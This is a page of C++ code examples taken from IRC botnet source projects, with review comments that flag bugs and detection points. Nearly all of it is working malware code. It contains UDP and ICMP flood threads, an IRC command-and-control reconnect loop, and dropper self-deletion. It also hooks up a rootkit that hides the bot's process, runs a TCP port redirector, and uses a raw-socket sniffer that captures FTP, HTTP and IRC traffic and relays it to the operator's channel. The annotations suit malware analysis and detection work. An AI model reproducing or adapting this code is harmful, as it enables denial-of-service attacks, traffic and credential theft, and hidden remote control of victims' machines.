예제 #1
// function for sending udp packets
DWORD WINAPI udp(LPVOID param)
{
	// Thread entry point. `param` points at a PINGFLOOD prepared by the spawning
	// code. It is copied by value first, then the spawner's copy is flagged with
	// gotinfo = TRUE — presumably the signal that the struct may be reused (the
	// same handshake appears in ping() and RedirectLoopThread() on this page).
	PINGFLOOD udp = *((PINGFLOOD *)param);
	PINGFLOOD *udps = (PINGFLOOD *)param;
	udps->gotinfo = TRUE;

	char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
	int i;

	srand(GetTickCount());

	// NOTE(review): the fsocket() result is never compared with INVALID_SOCKET,
	// and usock is not closed on any exit path below (one leaked socket per thread).
	SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;

	// Resolve udp.host: accept a dotted-quad first, fall back to a DNS lookup.
	IN_ADDR iaddr;
	iaddr.s_addr = finet_addr(udp.host);
	LPHOSTENT hostent = NULL;
	if (iaddr.s_addr == INADDR_NONE) 
		hostent = fgethostbyname(udp.host);
	if (hostent == NULL && iaddr.s_addr == INADDR_NONE) {
		// NOTE(review): unbounded sprintf() of udp.host into sendbuf[IRCLINE].
		sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host);
		if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
		addlog(sendbuf);

		clearthread(udp.threadnum);

		ExitThread(1);
	}
	// First address of the lookup result, or the literal address when no lookup was needed.
	ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr));
	// Port 0 means "pick one": a random value in 1..MAXPINGSIZE. The *size*
	// constant is reused as the port range bound here, which looks like a
	// copy/paste slip — MAXUDPPORT is the constant used for the clamp below.
	ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port)));

	// Clamp the field to [1, MAXUDPPORT]. This runs after sin_port was already
	// computed, so it only influences the udp.port == 0 test inside the loop —
	// which, as a consequence, can never be true (see below).
	if (udp.port < 1) 
		udp.port = 1;
	if (udp.port > MAXUDPPORT) 
		udp.port = MAXUDPPORT;
	// The outer loop counts batches; each batch is the 11-iteration inner loop.
	udp.num = udp.num / 10;
	if (udp.delay == 0) 
		udp.delay = 1;

	// Random payload (rand() % 255 never yields byte 255).
	// NOTE(review): udp.size is not clamped to MAXPINGSIZE — ping() below does
	// clamp its size — so a larger size writes past the end of pbuff.
	for (i = 0; i < udp.size; i++) 
		pbuff[i] = (char)(rand() % 255);
	while (udp.num-- > 0) {
		//change port every 10 packets (if one isn't specified)
		for (i = 0; i < 11; i++) {
			// Datagram length is size minus 0..9; for udp.size < 10 this goes negative.
			fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin));
			Sleep(udp.delay);
		}
		// Unreachable: udp.port was forced to >= 1 by the clamp above, so the
		// port chosen before the loop is kept for the whole run.
		if (udp.port == 0) 
			ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1));
	}
	sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host);
	if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
	addlog(sendbuf);

	clearthread(udp.threadnum);

	ExitThread(0);
}
예제 #2
파일: dcc.cpp 프로젝트: A-Massarella/Botnet
/**
 * Open a TCP socket and connect it to host:port.
 *
 * @param host  dotted-quad address or hostname; a hostname is looked up with
 *              fgethostbyname() and the first address of the result is used.
 * @param port  destination port in host byte order (converted with fhtons()).
 * @return      the connected socket, or INVALID_SOCKET when the socket could
 *              not be created, the name could not be resolved (socket is leaked
 *              on that path — see NOTE below), or connect() failed (socket is
 *              closed on that path). The caller owns the returned socket.
 *
 * The f-prefixed names look like the project's wrappers around the Winsock
 * functions of the same name — assumed, confirm against their definitions.
 */
SOCKET CreateSock(char *host, unsigned short port)
{
	SOCKET ssock;
	if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
		return INVALID_SOCKET;

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET;
	ssin.sin_port = fhtons(port);

	// Try the literal form first, DNS second.
	IN_ADDR in;
	in.s_addr = finet_addr(host);
	LPHOSTENT Hostent = NULL;
	if (in.s_addr == INADDR_NONE)
		Hostent = fgethostbyname(host); //hostname
	// NOTE(review): ssock is not closed on this failure path.
	if (Hostent == NULL && in.s_addr == INADDR_NONE)  //error dns
		return INVALID_SOCKET;
	ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));

	if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
		fclosesocket(ssock);
		return INVALID_SOCKET;
	}

	return (ssock);
}
예제 #3
//  function for sending pings
DWORD WINAPI ping(LPVOID param)
{
	// ICMP echo sender thread. `param` is a PINGFLOOD: copied by value, then the
	// spawner's copy is flagged gotinfo = TRUE (same handshake as udp() above).
	// NOTE(review): pbuff is never initialised, so every echo request carries
	// whatever stack bytes happen to be there as its payload.
	char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];

	// Destination address, network byte order (taken as-is from in_addr / h_addr_list).
	unsigned long ip;

	PINGFLOOD ping = *((PINGFLOOD *)param);
	PINGFLOOD *pings = (PINGFLOOD *)param;
	pings->gotinfo = TRUE;

	HANDLE icmp = (HANDLE)fIcmpCreateFile();

	// Resolve ping.host: dotted-quad first, DNS second.
	IN_ADDR iaddr;
	iaddr.s_addr = finet_addr(ping.host);
	LPHOSTENT hostent = NULL;
	if (iaddr.s_addr == INADDR_NONE) 
		hostent = fgethostbyname(ping.host);
	if ((hostent == NULL && iaddr.s_addr == INADDR_NONE) || icmp == INVALID_HANDLE_VALUE) {
		// NOTE(review): when only the name lookup failed, the valid icmp handle is
		// never closed. sprintf() of ping.host into sendbuf[IRCLINE] is unbounded.
		sprintf(sendbuf,"[PING]: Error sending pings to %s.", ping.host);
		if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice);
		addlog(sendbuf);

		clearthread(ping.threadnum);

		ExitThread(1);
	}

	// First address of the lookup result, or the literal address.
	if (hostent != NULL) 
		ip = *(DWORD*)*hostent->h_addr_list;
	else 
		ip = iaddr.s_addr;

	// Reply buffer for fIcmpSendEcho(); it is overwritten by every call and never read.
	ICMP_ECHO_REPLY reply;
	memset(&reply, 0, sizeof(reply));
	reply.RoundTripTime = 0xffffffff;

	// Keep RequestSize within pbuff.
  	if (ping.size > MAXPINGSIZE) 
		ping.size = MAXPINGSIZE;
	if (ping.delay < 1) 
		ping.delay = 1;
	// If fIcmpSendEcho mirrors IcmpSendEcho()'s signature, the last argument is
	// the reply timeout in ms — so `delay` bounds how long each call blocks rather
	// than inserting a pause between sends. Confirm against the wrapper.
	for (int i = 0; i < ping.num; i++)
		fIcmpSendEcho(icmp, ip, pbuff, ping.size, NULL, &reply, sizeof(ICMP_ECHO_REPLY), ping.delay);
	fIcmpCloseHandle(icmp);

	sprintf(sendbuf,"[PING]: Finished sending pings to %s.", ping.host);
	if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice);
	addlog(sendbuf);

	clearthread(ping.threadnum);

	ExitThread(0);
}
예제 #4
파일: imbot.cpp 프로젝트: hazcod/botnets
DWORD WINAPI Bthd(LPVOID param)
{
	// Main bot thread. `param` is unused.
	// Single-instance guard: try up to six times, 5 s apart, to create the named
	// mutex `xetumhandle` (defined elsewhere; the mutex name is a per-process
	// marker worth recording for detection), then wait up to 30 s to own a
	// second handle to the same mutex — a timeout means another instance holds
	// it, so this one exits.
	// NOTE(review): the handle from the second CreateMutex() is never stored or closed.
	for (int m=0;m<6;m++)
	{
		if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle)))
				Sleep(5000);
		else
			break;
	}
	if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT)
		ExitProcess(0);

	// Register this thread in the global thread table, then start Winsock.
	addthread(MAIN_THREAD,str_main_thread,main_title);
	srand(GetTickCount());
	dwstarted=GetTickCount();
	WSADATA wsadata;
	if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
		ExitProcess(-2);	// -2 becomes exit code 0xFFFFFFFE (UINT parameter)


	// i and id are not used anywhere in this function.
	int i=0;
	DWORD id=0;
	// Local (internal) IP: resolve our own hostname and keep the first address
	// as a string in the global inip.
	// NOTE(review): h is dereferenced without a NULL check (crash if the local
	// hostname cannot be resolved), and strncpy() leaves inip unterminated when
	// ip is sizeof(inip) characters or longer.
	char *ip;
	char hostname[256];
	struct hostent *h;
	fgethostname(hostname, 256);
	h = fgethostbyname(hostname);
	ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
	strncpy(inip,ip,sizeof(inip));


	curserver=0;
	HookProtocol(&mainirc);
	
	// Reconnect loop: cycle through sinfo[0..srvsz-1]. message_loop() is run
	// whether or not a fresh connection was started; after it returns, wait
	// SFLOOD_DELAY and move to the next server.
	while (mainirc.should_connect()) {
		if (!mainirc.is_connected())
		{
#ifdef _DEBUG
			printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port);
#endif
#ifndef NO_FLUSHDNS
			FlushDNSCache();
#endif
			// Nick, ident and real name are freshly generated for every attempt.
			mainirc.start(sinfo[curserver].host,sinfo[curserver].port,
					  mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
					  mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass);
			mainirc.message_loop();
		}
		else
			mainirc.message_loop();

		Sleep(SFLOOD_DELAY);
		
		if (curserver==(srvsz-1))
			curserver=0;
		else
			curserver++;
	}

	// cleanup;
	//killthreadall();
	fWSACleanup();
	ReleaseMutex(xetum);
	ExitThread(0);

		return TRUE;	// unreachable: ExitThread() does not return
}
예제 #5
파일: redirect.cpp 프로젝트: hazcod/botnets
// part of the redirect function, handles sending/receiving for the remote connection.
DWORD WINAPI RedirectLoopThread(LPVOID param)
{
	// Outbound half of a TCP redirect (port forward). `param` is a REDIRECT:
	// copied by value, then the spawner's copy is flagged gotinfo = TRUE (same
	// handshake as the other thread functions on this page).
	REDIRECT redirect = *((REDIRECT *)param);
	REDIRECT *redirectp = (REDIRECT *)param;
	redirectp->gotinfo = TRUE;

	// Slot in the global threads[] table whose .sock is the already-accepted client socket.
	int threadnum=redirect.cthreadnum;

	char sendbuf[IRCLINE], buff[4096];
	int err;
	DWORD id;
	
	SOCKET ssock;
	// do { ... break; } while (1) is used as a single-exit block: every failure
	// breaks out to the common close/cleanup code after the loop.
	do {
		// NOTE(review): on failure ssock == INVALID_SOCKET is still passed to fclosesocket() below.
		if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break;

		SOCKADDR_IN ssin;
		memset(&ssin, 0, sizeof(ssin));
		ssin.sin_family = AF_INET;
		ssin.sin_port = fhtons(redirect.port);

		// Resolve redirect.dest. A name goes through fgethostbyname(); a literal
		// address is turned back into a hostent via fgethostbyaddr() (a reverse
		// lookup), so a dotted-quad with no reverse record makes the thread give
		// up. Either way the first address of the result is used.
		IN_ADDR iaddr;
		iaddr.s_addr = finet_addr(redirect.dest);
		LPHOSTENT hostent;
		if (iaddr.s_addr == INADDR_NONE) 
			hostent = fgethostbyname(redirect.dest);
		else 
			hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET);
		if (hostent == NULL) break;
		ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);
	
		if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break;

		// Log line. Note sin_port is still in network byte order here (set with
		// fhtons() above), so the printed port number is byte-swapped.
		redirect.cgotinfo = FALSE;
		sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum); 
		// Register the outbound socket as a child of this thread and start
		// RedirectLoop2Thread (defined elsewhere; presumably it pumps the reverse
		// direction). Spin until that thread has copied `redirect`, which lives on
		// this stack — cgotinfo is the same handshake used on entry above.
		// NOTE(review): assignment inside the if condition.
		redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock);
		threads[redirect.cthreadnum].parent = redirect.threadnum;
		threads[redirect.cthreadnum].csock = threads[threadnum].sock;
		if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) {
			while (redirect.cgotinfo == FALSE) 
				Sleep(50);
		} else {
			addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError());
			break;
		}

		// Client -> destination pump: everything received on the accepted client
		// socket is forwarded to ssock until either side errors or closes.
		// The memset each iteration is unnecessary — only err bytes are sent.
		while (1) {
			memset(buff, 0, sizeof(buff));
			if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break;
			if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break;
		}
		break;
	} while (1);

	// Common exit: both sockets are closed and the table slot released
	// regardless of which break was taken.
	fclosesocket(threads[threadnum].sock);
	fclosesocket(ssock);

	clearthread(threadnum);

	ExitThread(0);
}
예제 #6
파일: reptile.cpp 프로젝트: hazcod/botnets
DWORD WINAPI BotThread(LPVOID param)
{
	// Main bot thread (a longer variant of Bthd() above). `param` is unused.
	// Single-instance guard: up to six attempts, 5 s apart, to create the named
	// mutex `mutexhandle` (defined elsewhere; the name is a per-process marker
	// worth recording for detection). The 30 s ownership wait that Bthd() does
	// is commented out here, so a second instance is not turned away.
	for (int m=0;m<6;m++)
	{
		if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
			Sleep(5000);
		else
			break;
	}
//	if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
//		ExitProcess(0);

	addthread(MAIN_THREAD,str_main_thread,main_title);

	// "Melt" (release builds only): read a file path stored under meltkey —
	// presumably the original dropper — delete that file (up to three attempts,
	// 2 s apart) and then remove the registry value that pointed at it.
#ifndef _DEBUG
#ifndef NO_MELT
		char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
		if (melt)
		{
			SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
			int tries=0;
			while (FileExists(melt) && tries<3)
			{
				DeleteFile(melt);
				tries++;
				Sleep(2000);
			}
			RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
		}
#endif // NO_MELT
#endif // _DEBUG

	srand(GetTickCount());
	dwstarted=GetTickCount();
	// Pick a random entry of versionlist[] — presumably the string reported on
	// version queries, given the NO_VERSION_REPLY guard.
#ifndef NO_VERSION_REPLY
	curversion=rand()%(versionsize);
#ifdef _DEBUG
	printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif

	WSADATA wsadata;
	if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
		ExitProcess(-2);	// -2 becomes exit code 0xFFFFFFFE (UINT parameter)

	// One-shot HTTP fetch of `cononstart` at start-up (release builds only).
	// The bytes read are discarded, so this looks like a check-in — confirm.
	// NOTE(review): when fInternetOpenUrl() fails the handles are closed inside
	// the `if`, but execution falls through to fInternetReadFile() on a NULL
	// handle and to a second fInternetCloseHandle() of both handles.
#ifndef _DEBUG
#ifndef NO_FCONNECT
	char readbuf[1024];
	HINTERNET httpopen, openurl;
	DWORD read;
	httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
	openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
	if (!openurl)
	{
		fInternetCloseHandle(httpopen);
		fInternetCloseHandle(openurl);
	}
	fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
	fInternetCloseHandle(httpopen);
	fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG

	// Installation timestamp (global installedt); "Error" when advapi32 is unavailable.
#ifndef NO_INSTALLED_TIME
	if (!noadvapi32)
		GetInstalledTime();
	else
		sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
	
	int i=0;
	DWORD id=0;

	// Background uptime recorder thread.
#ifndef NO_RECORD_UPTIME
	i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
	threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
	

	// "Secure" thread in loop mode (bdata2 = TRUE). NOTE(review): `secure` is a
	// local on this stack handed to a thread that outlives this scope's use of it.
#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
	NTHREAD secure;		
	secure.bdata2=TRUE;//loop
	i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
	threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
	
	// Kernel rootkit hook-up (release builds only): InitRK() loads the "fu"
	// component per the original comment, and HideMe() hides this process.
#ifndef NO_RDRIV
#ifndef _DEBUG
	rkenabled=InitRK();//initialize fu
	if (rkenabled)
		HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV

	// System-wide registry change (release builds only):
	// HKLM\SYSTEM\CurrentControlSet\Control\WaitToKillServiceTimeout = "7000".
	// A useful detection point for this sample.
#ifndef _DEBUG // maybe this will give the shutdown handler time to work
	RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
	
	//get internal ip
	// Same code as Bthd(). NOTE(review): h is dereferenced without a NULL check
	// (crash if the local hostname cannot be resolved), and strncpy() leaves
	// inip unterminated when ip is sizeof(inip) characters or longer.
	char *ip;
	char hostname[256];
	struct hostent *h;
	fgethostname(hostname, 256);
	h = fgethostbyname(hostname);
	ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
	strncpy(inip,ip,sizeof(inip));


	curserver=0;
	HookProtocol(&mainirc);
	
	// Reconnect loop: cycle through servers[0..serversize-1]. message_loop() is
	// run whether or not a fresh connection was started; after it returns, wait
	// SFLOOD_DELAY and move to the next server.
	while (mainirc.should_connect()) {
		if (!mainirc.is_connected())
		{
#ifdef _DEBUG
			printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
			FlushDNSCache();
#endif
			// Nick, ident and real name are freshly generated for every attempt.
			mainirc.start(servers[curserver].host,servers[curserver].port,
					  mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
					  mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
			mainirc.message_loop();
		}
		else
			mainirc.message_loop();

		Sleep(SFLOOD_DELAY);
		
		if (curserver==(serversize-1))
			curserver=0;
		else
			curserver++;
	}

	// cleanup;
	killthreadall();
	fWSACleanup();
	ReleaseMutex(mutex);
	ExitThread(0);
}
예제 #7
DWORD WINAPI SnifferThread(LPVOID param) { 
   // Packet-capture thread. `param` is a SNIFFER struct (same copy + gotinfo
   // handshake as the other thread functions on this page). It opens a raw IP
   // socket bound to the host's own address, switches it to receive-all mode and
   // reports TCP payloads matched by the IsSuspicious*() classifiers (defined
   // elsewhere) to the IRC channel. 
   SNIFFER sniff = *((SNIFFER *)param); 
   SNIFFER *sniffs = (SNIFFER *)param; 
   sniffs->gotinfo = TRUE; 

   char sendbuf[IRCLINE]; 
   int sock; sockaddr_in addr_in; hostent *hEnt; 
   IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; 
   char szName[255]={0}; unsigned long lLocalIp; 
   addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; 
   // Local address = first address of our own hostname. 
   // NOTE(review): hEnt is not checked for NULL before the memcpy. 
   fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); 
   memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); 
   addr_in.sin_addr.s_addr=lLocalIp; 

   // Raw socket; the SIO_RCVALL ioctl below asks the stack for every packet the
   // interface sees (typically needs administrative rights). Its presence is a
   // strong detection signal for this kind of thread. 
   sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); 

   // NOTE(review): returns a pointer constant from a DWORD function and, unlike
   // the other error paths here, skips clearthread() — the table slot stays allocated. 
   if(sock==INVALID_SOCKET) return NULL; 
   if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   int optval=1; DWORD dwBytesRet; 
   if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) 
   { 
      sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); 
      if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
      addlog(sendbuf); 
      fclosesocket(sock); 
      clearthread(sniff.threadnum); 
      ExitThread(0); 
   } 

   // ipHeader aliases the start of the receive buffer. 
   char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; 

   // Capture loop; it never exits, so the cleanup after it is unreachable. 
   while(1) 
   { 
      // Clear the buffer 
      memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; 

      // Read the raw packet 
      // NOTE(review): iRead is never checked. A failed recv() leaves the zeroed
      // buffer in place (proto == 0) so the iteration is just skipped; but a
      // packet that fills all 65535 bytes leaves no terminator for strlen() below. 
      iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); 

      // Process if its a TCP/IP packet 
      // Payload offsets assume fixed-size IP and TCP headers — no IHL / data
      // offset field is read, so options would shift the payload. Verify
      // against the IPHEADER and tcp_hdr_sniffer definitions. 
      if(ipHeader->proto==6) 
      {   tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); 
         int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; 
         // ntohs()/inet_ntoa() are called directly here, unlike the f-prefixed
         // wrappers used for the other socket calls in this function. 
         iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); 
          
         // Port 25 (SMTP) and 110 (POP3) traffic is ignored entirely; port 80 is
         // only run through the HTTP and VULN classifiers below. 
         if(iSrcPort !=110 && iSrcPort!=25 && 
            iDestPort !=110 && iDestPort!=25) 
         { 
         sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); 
         sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); 

         // Payload treated as a C string (relies on the memset above). CR/LF are
         // flattened so it fits on one IRC line; strlen() is re-evaluated every iteration. 
         szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); 
         for(int i=0; i<(int)strlen(szPacket); i++) { 
            if(szPacket[i]=='\r') szPacket[i]='\x20'; 
            if(szPacket[i]=='\n') szPacket[i]='\x20'; } 

         // Classifier cascade: first match wins; the matched payload is sent to
         // the channel with _snprintf() bounded to sendbuf. 
         if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 


         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 

         else if(IsSuspiciousHTTP(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
         else if(IsSuspiciousVULN(szPacket)) 
         { 
            _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); 
            if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); 
         } 
      } 
   } 
   } 
   // Unreachable: the while(1) above never breaks. 
   fclosesocket(sock); 
   clearthread(sniff.threadnum); 
   ExitThread(0); 
   return 0; 
}